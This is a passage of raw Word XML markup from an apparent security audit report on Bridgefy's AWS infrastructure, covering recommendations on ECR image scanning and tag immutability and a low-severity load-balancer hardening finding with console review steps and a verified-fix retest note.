        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to assess whether images are scanned for known vulnerabilities before they are pushed to AWS ECR. If such scanning is not performed, it should be enabled in AWS ECR. Alternatively, the CI/CD pipeline ought</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>improved</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it before images are pushed to the registry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="375"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is further advised to enable tag immutability to prevent replacing a container with a potentially malicious version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>162</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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1"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487627776">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>238257</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="105" name="Graphic 105"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="105" name="Graphic 105"/>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8.760401pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15688704;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape79" coordorigin="1440,375" coordsize="2880,0" path="m1440,375l4320,375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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>162</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="50"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId247">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aquasecurity.github.io/tfsec/v1.8.0/checks/aws/ecr/enforce-immutable-repository/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250020" w:id="35"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-030</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>ELB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. The proposed hardening options were enabled. It is recommended to review and potentially expand the WAF configuration in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy AWS ECS infrastructure makes use of an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Elastic Load Balancer </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(ELB) to expose services. It was found that minor hardening improvements can be applied to improve its configuration. Specifically, the load balancer does not remove invalid headers, fails to leverage the AWS WAF, and has no logging configuration. It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be further noted that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>relating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>controls during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="0" w:right="7825"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reviewing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ELB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="97" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Elastic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Balancers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="0" w:right="7752"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId248">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-10"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SDK-LoadBalancer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487628288">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1450759</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>412940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5196482" cy="2416968"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="106" name="Image 106"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="106" name="Image 106"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId249" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5196482" cy="2416968"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Integrations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tabs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Invalid Headers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>option, as well as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
